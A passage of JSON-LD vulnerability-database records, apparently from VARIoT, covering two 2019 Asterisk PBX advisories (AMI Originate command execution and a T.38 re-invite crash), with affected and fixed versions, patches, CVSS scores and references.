        "data": "An issue was discovered in manager.c in Sangoma Asterisk through 13.x, 16.x, 17.x and Certified Asterisk 13.21 through 13.21-cert4. A remote authenticated Asterisk Manager Interface (AMI) user without system authorization could use a specially crafted Originate AMI request to execute arbitrary system commands. Refer to the vendor information and take appropriate measures. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more.                \n\n                               Affected Versions       \n                         Product                       Release  \n                                                       Series   \n                  Asterisk Open Source                  13.x    All releases  \n                  Asterisk Open Source                  16.x    All releases  \n                  Asterisk Open Source                  17.x    All releases  \n                   Certified Asterisk                   13.21   All releases  \n\n                                  Corrected In                   \n                              Product                              Release    \n                       Asterisk Open Source                        13.29.2    \n                       Asterisk Open Source                        16.6.2     \n                       Asterisk Open Source                        17.0.1     \n                        Certified Asterisk                       13.21-cert5  \n\n                                     Patches                         \n                               SVN URL                                Revision   \n  http://downloads.asterisk.org/pub/security/AST-2019-007-13.diff    Asterisk 13 \n  http://downloads.asterisk.org/pub/security/AST-2019-007-16.diff    Asterisk 16 \n  http://downloads.asterisk.org/pub/security/AST-2019-007-17.diff    Asterisk 17 \n  http://downloads.asterisk.org/pub/security/AST-2019-007-13.21.diff Certified   \n                                                                     Asterisk    \n                                                                     13.21-cert5 \n\n    Links  https://issues.asterisk.org/jira/browse/ASTERISK-28580             \n\n    Asterisk Project Security Advisories are posted at                        \n    http://www.asterisk.org/security                                          \n                                                                              \n    This document may be superseded by later versions; if so, the latest      \n    version will be posted at                                                 \n    http://downloads.digium.com/pub/security/AST-2019-007.pdf and             \n    http://downloads.digium.com/pub/security/AST-2019-007.html                \n\n                                Revision History\n          Date            Editor                  Revisions Made              \n    October 24, 2019   George Joseph  Initial Revision                        \n    November 21, 2019  Ben Ford       Added \u201cPosted On\u201d date                  \n\n               Asterisk Project Security Advisory - AST-2019-007\n               Copyright \u00a9 2019 Digium, Inc. All Rights Reserved. \n  Permission is hereby granted to distribute and publish this advisory in its\n                           original, unaltered form",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-18610"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012584"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-03060"
          },
          {
            "db": "PACKETSTORM",
            "id": "155435"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-18610",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012584",
            "trust": 0.8
          },
          {
            "db": "PACKETSTORM",
            "id": "155435",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-03060",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2019.4526",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2019.4421",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1290",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-03060"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012584"
          },
          {
            "db": "PACKETSTORM",
            "id": "155435"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-18610"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1290"
          }
        ]
      },
      "id": "VAR-201911-1169",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-03060"
          }
        ],
        "trust": 1.6
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-03060"
          }
        ]
      },
      "last_update_date": "2023-12-18T12:27:54.873000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Security Advisories",
            "trust": 0.8,
            "url": "https://www.asterisk.org/downloads/security-advisories"
          },
          {
            "title": "AST-2019-007",
            "trust": 0.8,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-007.html"
          },
          {
            "title": "[SECURITY] [DLA 2017-1] asterisk security update",
            "trust": 0.8,
            "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
          },
          {
            "title": "Patch for Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Command Execution Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/196957"
          },
          {
            "title": "Sangoma Technologies Asterisk  and Sangoma Technologies Certified Asterisk Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=104055"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-03060"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012584"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1290"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-862",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012584"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-18610"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-007.html"
          },
          {
            "trust": 1.6,
            "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
          },
          {
            "trust": 1.6,
            "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
          },
          {
            "trust": 1.6,
            "url": "https://www.asterisk.org/downloads/security-advisories"
          },
          {
            "trust": 1.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18610"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18610"
          },
          {
            "trust": 0.6,
            "url": "https://seclists.org/fulldisclosure/2019/nov/19"
          },
          {
            "trust": 0.6,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-008.html"
          },
          {
            "trust": 0.6,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-006.html"
          },
          {
            "trust": 0.6,
            "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html   second message url unavailable at time of publishing"
          },
          {
            "trust": 0.6,
            "url": "https://vigilance.fr/vulnerability/asterisk-privilege-escalation-via-ami-originate-request-30936"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2019.4526/"
          },
          {
            "trust": 0.6,
            "url": "https://packetstormsecurity.com/files/155435/asterisk-project-security-advisory-ast-2019-007.html"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2019.4421/"
          },
          {
            "trust": 0.1,
            "url": "http://downloads.digium.com/pub/security/ast-2019-007.pdf"
          },
          {
            "trust": 0.1,
            "url": "http://downloads.digium.com/pub/security/ast-2019-007.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.asterisk.org/security"
          },
          {
            "trust": 0.1,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-007-13.diff"
          },
          {
            "trust": 0.1,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-007-17.diff"
          },
          {
            "trust": 0.1,
            "url": "https://issues.asterisk.org/jira/browse/asterisk-28580"
          },
          {
            "trust": 0.1,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-007-16.diff"
          },
          {
            "trust": 0.1,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-007-13.21.diff"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-03060"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012584"
          },
          {
            "db": "PACKETSTORM",
            "id": "155435"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-18610"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1290"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-03060"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012584"
          },
          {
            "db": "PACKETSTORM",
            "id": "155435"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-18610"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1290"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-01-14T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-03060"
          },
          {
            "date": "2019-12-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-012584"
          },
          {
            "date": "2019-11-21T23:30:33",
            "db": "PACKETSTORM",
            "id": "155435"
          },
          {
            "date": "2019-11-22T18:15:11.030000",
            "db": "NVD",
            "id": "CVE-2019-18610"
          },
          {
            "date": "2019-11-21T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201911-1290"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-01-21T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-03060"
          },
          {
            "date": "2019-12-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-012584"
          },
          {
            "date": "2022-06-03T14:34:50.917000",
            "db": "NVD",
            "id": "CVE-2019-18610"
          },
          {
            "date": "2022-04-06T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201911-1290"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "155435"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1290"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Sangoma Asterisk and  Certified Asterisk Vulnerabilities related to lack of authentication",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012584"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1290"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201911-1367

    Vulnerability from variot - Updated: 2023-12-18 12:27

    An issue was discovered in res_pjsip_t38.c in Sangoma Asterisk through 13.x and Certified Asterisk through 13.21-x. If it receives a re-invite initiating T.38 faxing and has a port of 0 and no c line in the SDP, a NULL pointer dereference and crash will occur. This is different from CVE-2019-18940. This vulnerability CVE-CVE-2019-18940 Is a different vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR), and more. The vulnerability originates from improper design or implementation during code development of a network system or product. An attacker could use this vulnerability to execute malicious code. Asterisk Project Security Advisory -

         Product        Asterisk                                              
         Summary        Re-invite with T.38 and malformed SDP causes crash.   
    Nature of Advisory  Remote Crash                                          
      Susceptibility    Remote Authenticated Sessions                         
         Severity       Minor                                                 
      Exploits Known    No                                                    
       Reported On      November 07, 2019                                     
       Reported By      Salah Ahmed                                           
        Posted On       November 21, 2019                                     
     Last Updated On    November 21, 2019                                     
     Advisory Contact   bford AT sangoma DOT com                              
         CVE Name       CVE-2019-18976
    
      Description     If Asterisk receives a re-invite initiating T.38        
                      faxing and has a port of 0 and no c line in the SDP, a  
                      crash will occur.                                       
    Modules Affected  res_pjsip_t38.c
    
    Resolution  If T.38 faxing is not needed, then the “t38_udptl”            
                configuration option in pjsip.conf can be set to “no” to      
                disable the functionality. This option automatically          
                defaults to “no” and would have to be manually turned on to   
                experience this crash.
    
                If T.38 faxing is needed, then Asterisk should be upgraded    
                to a fixed version.
    
                               Affected Versions       
                         Product                       Release  
                                                       Series   
                  Asterisk Open Source                  13.x    All versions  
                   Certified Asterisk                   13.21   All versions
    
                                  Corrected In                   
                              Product                              Release    
                       Asterisk Open Source                        13.29.2    
                        Certified Asterisk                       13.21-cert5
    
                                     Patches                         
                               SVN URL                                Revision
    

    http://downloads.asterisk.org/pub/security/AST-2019-008-13.diff Asterisk 13 http://downloads.asterisk.org/pub/security/AST-2019-008-13.21.diff Certified
    Asterisk
    13.21-cert5

    Links  https://issues.asterisk.org/jira/browse/ASTERISK-28612
    
    Asterisk Project Security Advisories are posted at                        
    http://www.asterisk.org/security
    
    This document may be superseded by later versions; if so, the latest      
    version will be posted at http://downloads.digium.com/pub/security/.pdf   
    and http://downloads.digium.com/pub/security/.html
    
                                Revision History
          Date          Editor                 Revisions Made                 
    November 12, 2019  Ben Ford  Initial Revision                             
    November 21, 2019  Ben Ford  Added “Posted On” date
    
                      Asterisk Project Security Advisory -
               Copyright © 2019 Digium, Inc. All Rights Reserved.
    

    Permission is hereby granted to distribute and publish this advisory in its original, unaltered form

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201911-1367",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "asterisk",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "digium",
            "version": "13.0.0"
          },
          {
            "model": "certified asterisk",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "digium",
            "version": "13.21"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "debian",
            "version": "9.0"
          },
          {
            "model": "asterisk",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "digium",
            "version": "13.29.1"
          },
          {
            "model": "asterisk",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "digium",
            "version": "13.x"
          },
          {
            "model": "certified asterisk",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "digium",
            "version": "13.21-x"
          },
          {
            "model": "asterisk",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "sangoma",
            "version": "\u003c=13.*"
          },
          {
            "model": "certified asterisk",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "sangoma",
            "version": "\u003c=13.21-*"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-01312"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012748"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-18976"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21:cert1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21:cert2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21:cert3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21:cert4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "13.29.1",
                    "versionStartIncluding": "13.0.0",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-18976"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "bford",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1292"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-18976",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 5.0,
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "CVE-2019-18976",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2020-01312",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 3.9,
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.5,
                "baseSeverity": "High",
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "CVE-2019-18976",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-18976",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-01312",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201911-1292",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-01312"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012748"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-18976"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1292"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "An issue was discovered in res_pjsip_t38.c in Sangoma Asterisk through 13.x and Certified Asterisk through 13.21-x. If it receives a re-invite initiating T.38 faxing and has a port of 0 and no c line in the SDP, a NULL pointer dereference and crash will occur. This is different from CVE-2019-18940. This vulnerability CVE-CVE-2019-18940 Is a different vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR), and more. The vulnerability originates from improper design or implementation during code development of a network system or product. An attacker could use this vulnerability to execute malicious code.                       Asterisk Project Security Advisory -\n\n         Product        Asterisk                                              \n         Summary        Re-invite with T.38 and malformed SDP causes crash.   \n    Nature of Advisory  Remote Crash                                          \n      Susceptibility    Remote Authenticated Sessions                         \n         Severity       Minor                                                 \n      Exploits Known    No                                                    \n       Reported On      November 07, 2019                                     \n       Reported By      Salah Ahmed                                           \n        Posted On       November 21, 2019                                     \n     Last Updated On    November 21, 2019                                     \n     Advisory Contact   bford AT sangoma DOT com                              \n         CVE Name       CVE-2019-18976                                        \n\n      Description     If Asterisk receives a re-invite initiating T.38        \n                      faxing and has a port of 0 and no c line in the SDP, a  \n                      crash will occur.                                       \n    Modules Affected  res_pjsip_t38.c                                         \n\n    Resolution  If T.38 faxing is not needed, then the \u201ct38_udptl\u201d            \n                configuration option in pjsip.conf can be set to \u201cno\u201d to      \n                disable the functionality. This option automatically          \n                defaults to \u201cno\u201d and would have to be manually turned on to   \n                experience this crash.                                        \n                                                                              \n                If T.38 faxing is needed, then Asterisk should be upgraded    \n                to a fixed version.                                           \n\n                               Affected Versions       \n                         Product                       Release  \n                                                       Series   \n                  Asterisk Open Source                  13.x    All versions  \n                   Certified Asterisk                   13.21   All versions  \n\n                                  Corrected In                   \n                              Product                              Release    \n                       Asterisk Open Source                        13.29.2    \n                        Certified Asterisk                       13.21-cert5  \n\n                                     Patches                         \n                               SVN URL                                Revision   \n  http://downloads.asterisk.org/pub/security/AST-2019-008-13.diff    Asterisk 13 \n  http://downloads.asterisk.org/pub/security/AST-2019-008-13.21.diff Certified   \n                                                                     Asterisk    \n                                                                     13.21-cert5 \n\n    Links  https://issues.asterisk.org/jira/browse/ASTERISK-28612             \n\n    Asterisk Project Security Advisories are posted at                        \n    http://www.asterisk.org/security                                          \n                                                                              \n    This document may be superseded by later versions; if so, the latest      \n    version will be posted at http://downloads.digium.com/pub/security/.pdf   \n    and http://downloads.digium.com/pub/security/.html                        \n\n                                Revision History\n          Date          Editor                 Revisions Made                 \n    November 12, 2019  Ben Ford  Initial Revision                             \n    November 21, 2019  Ben Ford  Added \u201cPosted On\u201d date                       \n\n                      Asterisk Project Security Advisory -\n               Copyright \u00a9 2019 Digium, Inc. All Rights Reserved. \n  Permission is hereby granted to distribute and publish this advisory in its\n                           original, unaltered form",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-18976"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012748"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-01312"
          },
          {
            "db": "PACKETSTORM",
            "id": "155436"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-18976",
            "trust": 3.1
          },
          {
            "db": "PACKETSTORM",
            "id": "155436",
            "trust": 1.7
          },
          {
            "db": "CS-HELP",
            "id": "SB2019112218",
            "trust": 1.6
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012748",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-01312",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2019.4421",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1292",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-01312"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012748"
          },
          {
            "db": "PACKETSTORM",
            "id": "155436"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-18976"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1292"
          }
        ]
      },
      "id": "VAR-201911-1367",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-01312"
          }
        ],
        "trust": 1.6
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT"
            ],
            "sub_category": null,
